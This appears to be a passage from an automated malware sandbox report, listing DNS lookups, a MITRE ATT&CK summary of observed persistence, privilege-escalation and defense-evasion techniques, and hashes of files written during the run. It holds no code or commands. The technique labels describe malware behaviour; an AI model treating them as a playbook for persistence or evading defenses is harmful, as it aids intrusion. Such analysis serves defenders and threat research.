82 B 175 B 1 1
DNS Request
prod.balrog.prod.cloudops.mozgcp.net
-
94 B 110 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
DNS Response
34.149.100.209
-
70 B 286 B 1 1
DNS Request
ciscobinary.openh264.org
DNS Response
88.221.134.209
88.221.134.155
-
67 B 99 B 1 1
DNS Request
a19.dscg10.akamai.net
DNS Response
88.221.134.155
88.221.134.209
-
67 B 123 B 1 1
DNS Request
a19.dscg10.akamai.net
DNS Response
2a02:26f0:a1::58dd:869b
2a02:26f0:a1::58dd:86d1
-
65 B 81 B 1 1
DNS Request
redirector.gvt1.com
DNS Response
142.250.180.14
-
65 B 81 B 1 1
DNS Request
redirector.gvt1.com
DNS Response
142.250.180.14
-
65 B 93 B 1 1
DNS Request
redirector.gvt1.com
DNS Response
2a00:1450:4009:81e::200e
-
3.2kB 9.3kB 7 10
-
71 B 116 B 1 1
DNS Request
r1---sn-5hnekn76.gvt1.com
DNS Response
209.85.226.6
-
69 B 85 B 1 1
DNS Request
r1.sn-5hnekn76.gvt1.com
DNS Response
209.85.226.6
-
69 B 97 B 1 1
DNS Request
r1.sn-5hnekn76.gvt1.com
DNS Response
2a00:1450:400e::6
-
1.8kB 5.9kB 5 7
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.179.238
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.179.238
-
61 B 89 B 1 1
DNS Request
play.google.com
DNS Response
2a00:1450:4009:81d::200e
-
3.3kB 9.3kB 8 10
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
2.3kB 3.4kB 4 8
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
Defense Evasion
  Impair Defenses (2)
    Disable or Modify Tools (2)
  Modify Registry (3)
  Virtualization/Sandbox Evasion (2)
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp
Filesize: 32KB
MD5: 10877cecf018f6bea78dbb175b4776e8
SHA1: 5274367db25fae477a55542b5581986555fc2bc3
SHA256: 4d4acab60bbb83010fdad81c1befdc0f4ce5bb8ad1880350bb2ffaa7d854269e
SHA512: 48af6543963d43a2c754c0dc893db6d0522f3e4131b936d8382fa100dacfae4973ec7a3b2c0ac0e332eba6a2c295afa10ed51f78a06eeed432845e5d90151f0c
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize: 15KB
MD5: 96c542dec016d9ec1ecc4dddfcbaac66
SHA1: 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256: 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512: cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize: 1.7MB
MD5: c7901bd93db80072751e0bbc88cf2bc3
SHA1: 611830be770290b0058f71a14ac81de635d2cc10
SHA256: 1dbe8bcb5469c4810154570f2feaafb1a887bdc1aa97c6cdddb68f1d9499d6f7
SHA512: 7e37023e41d5bf0e4e83ef84c131c996a174c120223afaee16b8be671d4fbdf6f3e7e7f660f3b6e73a78597ca9f3af31ecc1cd48bff08632a1167630bb5b2e49
-
Filesize: 4.9MB
MD5: 789b79d122173221ba3b85c7b08002e4
SHA1: 53e2ff13b7a76fc6090e5247b49e6e9828c419a1
SHA256: d3192eae45cef7e5ac18e9c5bfdc88ea27815a27b9b5619fb75853e20361e576
SHA512: b72de5178fc6a1e90c8b7de12023b1e1b7bdeeabaf8875d0543f976c86653d088f3b13712fae8bbe2024c46b0853b6d7670bc0205ca9b3a5d5cffe143f0aab0c
-
Filesize: 948KB
MD5: 454eb5ad9da9d9a48dde6b5aaee0796f
SHA1: 04791cb58b53f1cab386858acd545583f3233b7c
SHA256: 5195df1106599d81f62e9a30ad995725c4d90403541601aeadee75e47cbf45cf
SHA512: bea2e0f222427f80fbca8967ec40599f0bfd7f2f304349cba255f69f7ad2742021f36c66c70203a3309b66af89a86292393cdbb7e0c9232468c7bd8c534ededa
-
Filesize: 2.6MB
MD5: 5c31c87a24fa448bb5c97a88f3442510
SHA1: 6927671950c0ec1d33e1d94c5d8ee3d8ef906c7b
SHA256: 69767c62c9e48334a6ddffffb0fc21dac94466f34006a08caa11440e0e54682d
SHA512: 7c0139fcfd036df1b8f2b62cb1479baad2671759621c276e87fd50e37c5bb53de18a3b1e64dac4539c6d0aa9feff01cc2cfef05d166008a6c337400be7ea9f0d
-
Filesize: 1.8MB
MD5: a93b02d857db3b12c32bd765b83825ab
SHA1: 137f12047a081e6581e1d1a83c939d98514c3ff3
SHA256: 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa
SHA512: aab2bfd4090c77b87784d0110f5ee2dd24554fada9bdf9c2e8e08ff01a9025f5d8a7dfa2d4b89bf35cb037c162292a04f1084b87727b1bd201a9b5ab1b367bcd
-
Filesize: 442KB
MD5: 85430baed3398695717b0263807cf97c
SHA1: fffbee923cea216f50fce5d54219a188a5100f41
SHA256: a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512: 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize: 8.0MB
MD5: a01c5ecd6108350ae23d2cddf0e77c17
SHA1: c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256: 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512: b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
Filesize: 9KB
MD5: e5dc959214b9dd501fa3e098e719c415
SHA1: ab22cca6b322fbbfe5c3d2c4ca4ce3618bca4a52
SHA256: 5941c50243713c9967d518324e958f4eed3659b4ca586eb4ee1e00ee4993d176
SHA512: 2233a63c3cd494db71768a4455738cde3a9a67062fa6b9b6b5adb6eef7b4e1db0835394ba101762ef26c149bc3095fbc5c456ccffb5a80c3d9e534faf5b310b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
Filesize: 9KB
MD5: d96fdd823b1a28a0ae3bfd0923253251
SHA1: e778b48ff952f8222f661b7dd60193bcb6cd3a7c
SHA256: c6faebc67e4176bdfeca30dba74844c6e2e72f51b42d0c11f56f2c20314d5173
SHA512: e9a3846ac6d8360b06f615a3485e4906291ecf64a6a6b311df773e3342d223fe6794d686b39c7baad754b301ef0e4060ee8d25eb2c350e31d72b48d239edc1a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\47ed02a4-0213-4b7d-aca4-e04ca3a8c7b6
Filesize: 733B
MD5: 25fdfa8579cb76bfc0649dd6bbddc397
SHA1: 4494e4de59dfb874dbe4f0259e671740536dad60
SHA256: cb3581f2ca50df8525afefa132147fa2b3d63feebafa4ebf74666ce46b6c97f7
SHA512: 75fcdbfe6cc3cf1e95f36744869731954017297169ccb288554a17fc8ed3fa5a39ed9a0fe9a9f4a7b27833325d801766a7ce6fac6ad7742f429f12163cdf7d7d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize: 997KB
MD5: fe3355639648c417e8307c6d051e3e37
SHA1: f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256: 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512: 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize: 116B
MD5: 3d33cdc0b3d281e67dd52e14435dd04f
SHA1: 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256: f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512: a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize: 479B
MD5: 49ddb419d96dceb9069018535fb2e2fc
SHA1: 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256: 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512: 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize: 372B
MD5: 8be33af717bb1b67fbd61c3f4b807e9e
SHA1: 7cf17656d174d951957ff36810e874a134dd49e0
SHA256: e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512: 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize: 11.8MB
MD5: 33bf7b0439480effb9fb212efce87b13
SHA1: cee50f2745edc6dc291887b6075ca64d716f495a
SHA256: 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512: d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize: 1KB
MD5: 688bed3676d2104e7f17ae1cd2c59404
SHA1: 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256: 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512: 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize: 1KB
MD5: 937326fead5fd401f6cca9118bd9ade9
SHA1: 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256: 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512: b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize: 7KB
MD5: 49438ddf6d77f0fe197831347b3eabaf
SHA1: 1ab822ae405baa57e133b2510af38c520bb0811d
SHA256: dc5881629f0b7d7ef8f781f8d3a84a69203e7e12c38d37b6a809d9fc01d0a948
SHA512: ca9c99265617f8b3589ab86fc46cab5056d34697f7dd361a653a22c5c2bfc02bf45e8bbc1ec82eb0cbf5b07dd52783b2b22cf246087f82eea04d2586f4375916
-
Filesize: 7KB
MD5: 2c38024e8f9b16cf341cf764d179b0de
SHA1: cc3b021903bd21e6f66d0bd45a77867f7aef519a
SHA256: f31638fb71c1b759dd97d55deafb6868ae5a19226b10337591755b5a178f672d
SHA512: 8b1775eaf73289a6bdbe14d848ae1a768dfa05c27413a41ed19ffffbc1fa9ece2c808b2cb289ca2308bb57fe01faf8dedc3cdd80c32c77147f0184587b08f380
-
Filesize: 6KB
MD5: fa0d927cef00a33e5fa4f63f7f2eff50
SHA1: 4d86bb4f49969d16bc0cbf3dbe07caf889c329de
SHA256: da5b547890299e50cfc5f7ac43d2e0d1a43b4e08a07e3dadb16debc36bca838a
SHA512: 0841e61b8d990be083577ea3180ecf96e0eb684aae3c5c46a2848a0a398f2684f69a37c410f5dcfbb0bbbd00fc1032998eb436bf97748d8317926379f37a979a
-
Filesize: 6KB
MD5: b113bbde27c8ad0f196019593969cb84
SHA1: 44b463a636143142e2146d111de3e4cc32918b8b
SHA256: d6cecc3f36da4f174233861280459d8f7895f2732f9df0af3817bbf2b282d2b6
SHA512: acd2d73d1ff66638619171ceaa9954611e26837829582c31d04fe7039ccf2c6c906993b919f414a6e71f879371437e02ca33a3a674230703bf618de19b6f19e5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4
Filesize: 4KB
MD5: c2ff0ba2baab4dcc4155092bef83032e
SHA1: 11444997f2d0506eb97f997d0a31cf231f62df88
SHA256: c899647873aa580048d64f853465928b6fd5a491822a916d2bb95ca96f14fc8c
SHA512: 533128b0381d8bb6ddc3d45c21f5f5cf083ca36a5b84ae77a7ac588b897f086a80e23c06b51b3a2a4361b2f9ceb87dd7fddc97edfb42b6b193a25161ad44b39c